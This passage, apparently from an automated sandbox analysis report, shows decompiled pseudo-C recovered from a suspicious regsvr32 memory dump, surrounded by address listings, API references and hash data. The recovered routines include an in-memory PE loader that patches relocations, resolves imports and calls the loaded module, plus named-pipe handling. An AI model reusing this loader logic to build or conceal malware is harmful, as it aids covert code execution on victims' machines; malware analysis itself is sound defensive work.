						_t72 = _t178;
						L42:
						return _t72;
					}
					goto L4;
				}
			}


























































                                                                                                                                                                                              0x049951b9
                                                                                                                                                                                              0x049951c6
                                                                                                                                                                                              0x049951c8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049951ca
                                                                                                                                                                                              0x049951ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049951ce
                                                                                                                                                                                              0x049951bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049951bf
                                                                                                                                                                                              0x04995188
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04995113
                                                                                                                                                                                              0x0499511e
                                                                                                                                                                                              0x04995124
                                                                                                                                                                                              0x04995126
                                                                                                                                                                                              0x049953b5
                                                                                                                                                                                              0x049953b9
                                                                                                                                                                                              0x049953be
                                                                                                                                                                                              0x049953c0
                                                                                                                                                                                              0x049953c6
                                                                                                                                                                                              0x049953c6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04995126

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1985475764-0
                                                                                                                                                                                              • Opcode ID: 6cca0415374c8d8c3af9cefef9a4eefc0dc42b2450757c0a9b1e626e7a06e4ab
                                                                                                                                                                                              • Instruction ID: 1c19a6d921f65bb4829aa7ea88694daf54ff84578ab558760680b1ba963753af
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cca0415374c8d8c3af9cefef9a4eefc0dc42b2450757c0a9b1e626e7a06e4ab
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1681CF72704301ABEB15EE28D845B7F77EAEBC5328F15493DE4568B280EB74BC058A91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E0499DE26(WCHAR* __ecx) {
                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                              				WCHAR* _v12;
                                                                                                                                                                                              				WCHAR* _v16;
                                                                                                                                                                                              				WCHAR* _v140;
                                                                                                                                                                                              				WCHAR* _v144;
                                                                                                                                                                                              				short _v664;
                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                              				signed int _t30;
                                                                                                                                                                                              				WCHAR* _t36;
                                                                                                                                                                                              				int _t40;
                                                                                                                                                                                              				signed int _t41;
                                                                                                                                                                                              				int _t44;
                                                                                                                                                                                              				signed int _t45;
                                                                                                                                                                                              				WCHAR* _t49;
                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                              				WCHAR* _t52;
                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                                                              				_t51 = 0;
                                                                                                                                                                                              				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                                                                                                                                              				_t44 = _v8;
                                                                                                                                                                                              				_t41 = 0;
                                                                                                                                                                                              				_v12 = _t28;
                                                                                                                                                                                              				if(_t44 <= 0) {
                                                                                                                                                                                              					L22:
                                                                                                                                                                                              					_t29 = _t28 | 0xffffffff;
                                                                                                                                                                                              					__eflags = _t29;
                                                                                                                                                                                              					return _t29;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					goto L1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					L1:
                                                                                                                                                                                              					_t49 =  *(_t28 + _t41 * 4);
                                                                                                                                                                                              					_t30 =  *_t49 & 0x0000ffff;
                                                                                                                                                                                              					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
                                                                                                                                                                                              						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
                                                                                                                                                                                              						_t40 = lstrlenW(_t49);
                                                                                                                                                                                              						_t45 = 0;
                                                                                                                                                                                              						if(_t40 <= 0) {
                                                                                                                                                                                              							L11:
                                                                                                                                                                                              							_t44 = _v8;
                                                                                                                                                                                              							_t51 = _t51 + 1;
                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							goto L8;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							L8:
                                                                                                                                                                                              							if(_t49[_t45] == 0x2c) {
                                                                                                                                                                                              								_t49[_t45] = 0;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t45 = _t45 + 1;
                                                                                                                                                                                              						} while (_t45 < _t40);
                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L12:
                                                                                                                                                                                              					_t28 = _v12;
                                                                                                                                                                                              					_t41 = _t41 + 1;
                                                                                                                                                                                              				} while (_t41 < _t44);
                                                                                                                                                                                              				if(_t51 != 1) {
                                                                                                                                                                                              					if(__eflags <= 0) {
                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t52 = _v140;
                                                                                                                                                                                              					L17:
                                                                                                                                                                                              					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
                                                                                                                                                                                              						lstrcpynW(_v16, _t52, 0x104);
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						GetCurrentDirectoryW(0x104,  &_v664);
                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                              						_push(_t52);
                                                                                                                                                                                              						_push(0x49ac9a0);
                                                                                                                                                                                              						_t36 = E04999A5A( &_v664);
                                                                                                                                                                                              						_v12 = _t36;
                                                                                                                                                                                              						lstrcpynW(_v16, _t36, 0x104);
                                                                                                                                                                                              						E04998BF4( &_v12, 0xfffffffe);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t52 = _v144;
                                                                                                                                                                                              				goto L17;
                                                                                                                                                                                              			}





















                                                                                                                                                                                              0x0499de92
                                                                                                                                                                                              0x0499dea6
                                                                                                                                                                                              0x0499dea6
                                                                                                                                                                                              0x0499dea9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499de94
                                                                                                                                                                                              0x0499de94
                                                                                                                                                                                              0x0499de99
                                                                                                                                                                                              0x0499de9d
                                                                                                                                                                                              0x0499de9d
                                                                                                                                                                                              0x0499dea1
                                                                                                                                                                                              0x0499dea2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499de94
                                                                                                                                                                                              0x0499deaa
                                                                                                                                                                                              0x0499deaa
                                                                                                                                                                                              0x0499dead
                                                                                                                                                                                              0x0499deae
                                                                                                                                                                                              0x0499deb5
                                                                                                                                                                                              0x0499debf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499dec1
                                                                                                                                                                                              0x0499dec7
                                                                                                                                                                                              0x0499decb
                                                                                                                                                                                              0x0499df24
                                                                                                                                                                                              0x0499ded4
                                                                                                                                                                                              0x0499dee1
                                                                                                                                                                                              0x0499dee7
                                                                                                                                                                                              0x0499dee9
                                                                                                                                                                                              0x0499def0
                                                                                                                                                                                              0x0499def6
                                                                                                                                                                                              0x0499defe
                                                                                                                                                                                              0x0499df06
                                                                                                                                                                                              0x0499df12
                                                                                                                                                                                              0x0499df18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499df2a
                                                                                                                                                                                              0x0499deb7
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 0499DE3B
                                                                                                                                                                                              • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0499DE46
                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 0499DE88
                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0499DEE1
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0499DF06
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000104), ref: 0499DF24
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1259063344-0
                                                                                                                                                                                              • Opcode ID: fde7620f1f07021c4ccd27f5454516018550d2d006de92764c4441b9c63ae7a4
                                                                                                                                                                                              • Instruction ID: 01b85317874807737f539367fd7849cb9396d5dd69e8356b616d629654e0253a
                                                                                                                                                                                              • Opcode Fuzzy Hash: fde7620f1f07021c4ccd27f5454516018550d2d006de92764c4441b9c63ae7a4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4631D271D00117ABEF24AF9CC8C8AAEB7F9EF56351F104A79E406E6054E774AD90CB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0499E66A
                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 0499E672
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0499E686
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0499E701
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0499E704
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0499E709
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 344208780-0
                                                                                                                                                                                              • Opcode ID: 893b920062f6815f07866980ea577ab3250dc43b6b639fd730f0c3504ee39e2b
                                                                                                                                                                                              • Instruction ID: 6af607a3d856117efcaac686383e5d5c06994455c5f4ac485c733a30aad31506
                                                                                                                                                                                              • Opcode Fuzzy Hash: 893b920062f6815f07866980ea577ab3250dc43b6b639fd730f0c3504ee39e2b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B21CCB5900218BFDF04DFA9CC88DAEBBBDEF49654B104469F505A7250DA71AE01DBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                                                              			E049A3D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                                                                                                                                              				signed int _v5;
                                                                                                                                                                                              				signed short _v12;
                                                                                                                                                                                              				intOrPtr* _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				signed int* _v24;
                                                                                                                                                                                              				unsigned int _v28;
                                                                                                                                                                                              				signed short* _v32;
                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                              				signed int _v40;
                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                              				intOrPtr* _v48;
                                                                                                                                                                                              				signed short* _v52;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				unsigned int _v60;
                                                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                                                              				_Unknown_base(*)()* _v68;
                                                                                                                                                                                              				signed int _v72;
                                                                                                                                                                                              				intOrPtr _v76;
                                                                                                                                                                                              				intOrPtr _v80;
                                                                                                                                                                                              				intOrPtr _v84;
                                                                                                                                                                                              				unsigned int _v88;
                                                                                                                                                                                              				intOrPtr _v92;
                                                                                                                                                                                              				signed int _v96;
                                                                                                                                                                                              				intOrPtr _v100;
                                                                                                                                                                                              				intOrPtr _v104;
                                                                                                                                                                                              				intOrPtr _v108;
                                                                                                                                                                                              				intOrPtr _v112;
                                                                                                                                                                                              				CHAR* _v116;
                                                                                                                                                                                              				signed int _v120;
                                                                                                                                                                                              				intOrPtr _v124;
                                                                                                                                                                                              				signed int _v128;
                                                                                                                                                                                              				signed int _v132;
                                                                                                                                                                                              				signed int _t216;
                                                                                                                                                                                              				signed int _t233;
                                                                                                                                                                                              				void* _t273;
                                                                                                                                                                                              				signed int _t278;
                                                                                                                                                                                              				signed int _t280;
                                                                                                                                                                                              				intOrPtr _t320;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v44 = _v44 & 0x00000000;
	_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
	_v20 = _v84;
	_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
	_v64 = _t320;
	if(_t320 == 0) {
		L13:
		while(0 != 0) {
		}
		_push(8);
		if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
			L35:
			if(_a16 == 0) {
				L54:
				_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
				while(0 != 0) {
				}
				if(_a12 != 0) {
					 *_a12 = _v80;
				}
				 *((intOrPtr*)(_v20 + 0x34)) = _a4;
				_v124 = _v80(_a4, 1, _a8);
				while(0 != 0) {
				}
				if(_v124 != 0) {
					if(_v44 == 0) {
						L77:
						return 1;
					}
					if(_a20 != 1) {
						if(_a20 != 2) {
							L75:
							while(0 != 0) {
							}
							goto L77;
						}
						while(0 != 0) {
						}
						_v132 = _v44;
						goto L75;
					}
					while(0 != 0) {
					}
					_v44();
					goto L75;
				}
				while(0 != 0) {
				}
				return 0;
			}
			while(0 != 0) {
			}
			_push(8);
			if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
				goto L54;
			}
			_v128 = 0x80000000;
			_t216 = 8;
			_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
			_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
			_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
			_v104 =  *((intOrPtr*)(_v76 + 0x18));
			while(0 != 0) {
			}
			_v40 = _v40 & 0x00000000;
			while(_v40 < _v104) {
				_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
				_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
				if(lstrcmpA(_v116, _a16) != 0) {
					_v40 = _v40 + 1;
					continue;
				}
				while(0 != 0) {
				}
				_v44 = _v120;
				break;
			}
			if(_v44 != 0) {
				goto L54;
			}
			while(0 != 0) {
			}
			return 0xffffffff;
		}
		_v96 = 0x80000000;
		_t233 = 8;
		_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
		while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
			_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
			if(_v36 == 0) {
				_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
			}
			if(_v36 != 0) {
				if( *_v16 == 0) {
					_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
				} else {
					_v24 =  *_v16 + _a4;
				}
				_v72 = _v72 & 0x00000000;
				while( *_v24 != 0) {
					if(( *_v24 & _v96) == 0) {
						_v100 =  *_v24 + _a4;
						_v68 = GetProcAddress(_v36, _v100 + 2);
					} else {
						_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
					}
					if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
						 *_v24 = _v68;
					} else {
						 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
					}
					_v24 =  &(_v24[1]);
					_v72 = _v72 + 4;
				}
				_v16 = _v16 + 0x14;
				continue;
			} else {
				_t273 = 0xfffffffd;
				return _t273;
			}
		}
		goto L35;
	}
	_t278 = 8;
	_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
	_t280 = 8;
	_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
	while(0 != 0) {
	}
	while(_v56 > 0) {
		_v28 = _v52[2];
		_v56 = _v56 - _v28;
		_v28 = _v28 - 8;
		_v28 = _v28 >> 1;
		_v32 =  &(_v52[4]);
		_v92 = _a4 +  *_v52;
		_v60 = _v28;
		while(1) {
			_v88 = _v60;
			_v60 = _v60 - 1;
			if(_v88 == 0) {
				break;
			}
			_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
			_v12 =  *_v32 & 0xfff;
			_v48 = (_v12 & 0x0000ffff) + _v92;
			if((_v5 & 0x000000ff) != 3) {
				if((_v5 & 0x000000ff) == 0xa) {
					 *_v48 =  *_v48 + _v64;
				}
			} else {
				 *_v48 =  *_v48 + _v64;
			}
			_v32 =  &(_v32[1]);
		}
		_v52 = _v32;
	}
	goto L13;
}

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 049A3ECD
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 049A3EE6
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 049A3F42
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 049A3F61
                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00000000), ref: 049A4052
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1872726118-0
                                                                                                                                                                                              • Opcode ID: 5ee1e07c21797fa36c7f73c9e3ff67cabf5174fc9683a2492c5763deebfa10e7
                                                                                                                                                                                              • Instruction ID: da8e53a207a6668979d903dd4d44f5b4859a86ebdaaa2cb54134011f82db17e1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ee1e07c21797fa36c7f73c9e3ff67cabf5174fc9683a2492c5763deebfa10e7
                                                                                                                                                                                              • Instruction Fuzzy Hash: A9E1CF74E00219DFDB24CFA8C984AADBBB5FF08314F148569E811EB391D770A9A1DB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                              • API String ID: 0-2132903582
                                                                                                                                                                                              • Opcode ID: 8acb0c2731a6ec1b8b3e67a4dfa85e1473944c0cf4b11918675b597882270285
                                                                                                                                                                                              • Instruction ID: 7bee3dee265eca3e62a9fc43a9059bda5d494453ed70c43502f93e862461e286
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8acb0c2731a6ec1b8b3e67a4dfa85e1473944c0cf4b11918675b597882270285
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6641D275700205AFEB284EA8AD9FABE3A5EEF40354F180536F902A6244F261F97482D5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                              			E049A3379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                                                                                                              				signed int _t12;
                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                              				char* _t31;
                                                                                                                                                                                              				char* _t33;
                                                                                                                                                                                              				char* _t35;
                                                                                                                                                                                              				char* _t37;
                                                                                                                                                                                              				char* _t38;
                                                                                                                                                                                              				long long* _t40;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t30 = __edi;
                                                                                                                                                                                              				_t12 = _a20;
                                                                                                                                                                                              				if(_t12 == 0) {
                                                                                                                                                                                              					_t12 = 0x11;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t35 = _a4;
                                                                                                                                                                                              				_push(_t25);
                                                                                                                                                                                              				 *_t40 = _a12;
                                                                                                                                                                                              				_push(_t12);
                                                                                                                                                                                              				_push("%.*g");
                                                                                                                                                                                              				_push(_a8);
                                                                                                                                                                                              				_push(_t35);
                                                                                                                                                                                              				L049A34D2();
                                                                                                                                                                                              				_t23 = _t12;
                                                                                                                                                                                              				if(_t23 < 0 || _t23 >= _a8) {
                                                                                                                                                                                              					L16:
                                                                                                                                                                                              					_t13 = _t12 | 0xffffffff;
                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					E049A3352(_t12, _t35);
                                                                                                                                                                                              					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                                                                                                                                              						L8:
                                                                                                                                                                                              						_push(_t30);
                                                                                                                                                                                              						_t37 = strchr(_t35, 0x65);
                                                                                                                                                                                              						_t31 = _t37;
                                                                                                                                                                                              						if(_t37 == 0) {
                                                                                                                                                                                              							L15:
                                                                                                                                                                                              							_t13 = _t23;
                                                                                                                                                                                              							L17:
                                                                                                                                                                                              							return _t13;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t38 = _t37 + 1;
                                                                                                                                                                                              						_t33 = _t31 + 2;
                                                                                                                                                                                              						if( *_t38 == 0x2d) {
                                                                                                                                                                                              							_t38 = _t33;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						while( *_t33 == 0x30) {
                                                                                                                                                                                              							_t33 = _t33 + 1;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t33 != _t38) {
                                                                                                                                                                                              							E04998CE0(_t38, _t33, _t23 - _t33 + _a4);
                                                                                                                                                                                              							_t23 = _t23 + _t38 - _t33;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t6 = _t23 + 3; // 0x49a1b64
                                                                                                                                                                                              						_t12 = _t6;
                                                                                                                                                                                              						if(_t12 >= _a8) {
                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t35[_t23] = 0x302e;
                                                                                                                                                                                              						( &(_t35[2]))[_t23] = 0;
                                                                                                                                                                                              						_t23 = _t23 + 2;
                                                                                                                                                                                              						goto L8;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}














                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: strchr$_snprintf
                                                                                                                                                                                              • String ID: %.*g
                                                                                                                                                                                              • API String ID: 3619936089-952554281
                                                                                                                                                                                              • Opcode ID: 527ea1523dad494a2dde05e4543de59b59b2ce37c7bc0e69c35ed5844111f7ac
                                                                                                                                                                                              • Instruction ID: d74c445f67de5e2cf437740bed3e2d70354fa9ac3b903fbd71ecaa106aee0e31
                                                                                                                                                                                              • Opcode Fuzzy Hash: 527ea1523dad494a2dde05e4543de59b59b2ce37c7bc0e69c35ed5844111f7ac
                                                                                                                                                                                              • Instruction Fuzzy Hash: C8218762344B053BEB324E98EC81FAA3BCCAF42768F594034FC449A580EB60F97043D0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                                                              			E0499377F(void* __fp0) {
                                                                                                                                                                                              				signed int _v144;
                                                                                                                                                                                              				signed int _v152;
                                                                                                                                                                                              				char _v160;
                                                                                                                                                                                              				char _v164;
                                                                                                                                                                                              				char _v168;
                                                                                                                                                                                              				signed int _v172;
                                                                                                                                                                                              				char _v176;
                                                                                                                                                                                              				intOrPtr _v180;
                                                                                                                                                                                              				signed int _v184;
                                                                                                                                                                                              				signed int _v188;
                                                                                                                                                                                              				signed int _v192;
                                                                                                                                                                                              				signed int _v196;
                                                                                                                                                                                              				char _v200;
                                                                                                                                                                                              				signed int _v204;
                                                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                                              				signed int _t80;
                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                              				signed int _t84;
                                                                                                                                                                                              				signed int _t87;
                                                                                                                                                                                              				signed int _t88;
                                                                                                                                                                                              				signed int _t100;
                                                                                                                                                                                              				void* _t102;
                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                              				unsigned int* _t104;
                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                              				signed int _t113;
                                                                                                                                                                                              				void* _t118;
                                                                                                                                                                                              				intOrPtr _t124;
                                                                                                                                                                                              				signed int _t127;
                                                                                                                                                                                              				intOrPtr _t129;
                                                                                                                                                                                              				intOrPtr _t132;
                                                                                                                                                                                              				void* _t133;
                                                                                                                                                                                              				void* _t137;
                                                                                                                                                                                              				signed int _t146;
                                                                                                                                                                                              				signed int _t148;
                                                                                                                                                                                              				signed short* _t149;
                                                                                                                                                                                              				signed int _t159;
                                                                                                                                                                                              				intOrPtr* _t183;
                                                                                                                                                                                              				void* _t187;
                                                                                                                                                                                              				void* _t188;
                                                                                                                                                                                              				void* _t189;
                                                                                                                                                                                              				signed short* _t192;
                                                                                                                                                                                              				void* _t196;
                                                                                                                                                                                              				signed int _t199;
                                                                                                                                                                                              				signed int _t200;
                                                                                                                                                                                              				signed int _t203;
                                                                                                                                                                                              				signed int _t204;
                                                                                                                                                                                              				char _t205;
                                                                                                                                                                                              				signed int _t206;
                                                                                                                                                                                              				void* _t208;
                                                                                                                                                                                              				void* _t214;
                                                                                                                                                                                              				void* _t221;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t221 = __fp0;
                                                                                                                                                                                              				_t208 = (_t206 & 0xfffffff8) - 0xac;
                                                                                                                                                                                              				_v144 = 0;
                                                                                                                                                                                              				_v172 = 0;
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t72 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( *0x49af804);
                                                                                                                                                                                              					_v152 = 0;
                                                                                                                                                                                              					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v160);
                                                                                                                                                                                              					_t75 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              					_push(0x80000);
                                                                                                                                                                                              					_push( *0x49af8bc);
                                                                                                                                                                                              					_push( *0x49af804);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
                                                                                                                                                                                              						GetLastError();
                                                                                                                                                                                              						goto L56;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t149 =  *0x49af8bc; // 0x0
                                                                                                                                                                                              						_t80 =  *_t149 & 0x0000ffff;
                                                                                                                                                                                              						_t214 = _t80 - 8;
                                                                                                                                                                                              						if(_t214 > 0) {
                                                                                                                                                                                              							_t81 = _t80 - 9;
                                                                                                                                                                                              							__eflags = _t81;
                                                                                                                                                                                              							if(_t81 == 0) {
                                                                                                                                                                                              								E049A0962( &_v200);
                                                                                                                                                                                              								L12:
                                                                                                                                                                                              								_t84 =  &_v200;
                                                                                                                                                                                              								L13:
                                                                                                                                                                                              								_push(4);
                                                                                                                                                                                              								L14:
                                                                                                                                                                                              								_push(_t84);
                                                                                                                                                                                              								_push(5);
                                                                                                                                                                                              								L31:
                                                                                                                                                                                              								_pop(_t187);
                                                                                                                                                                                              								E0499D1A6(_t187);
                                                                                                                                                                                              								L32:
                                                                                                                                                                                              								L56:
                                                                                                                                                                                              								DisconnectNamedPipe( *0x49af804);
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								_pop(0);
                                                                                                                                                                                              								if(_v172 == 0) {
                                                                                                                                                                                              									continue;
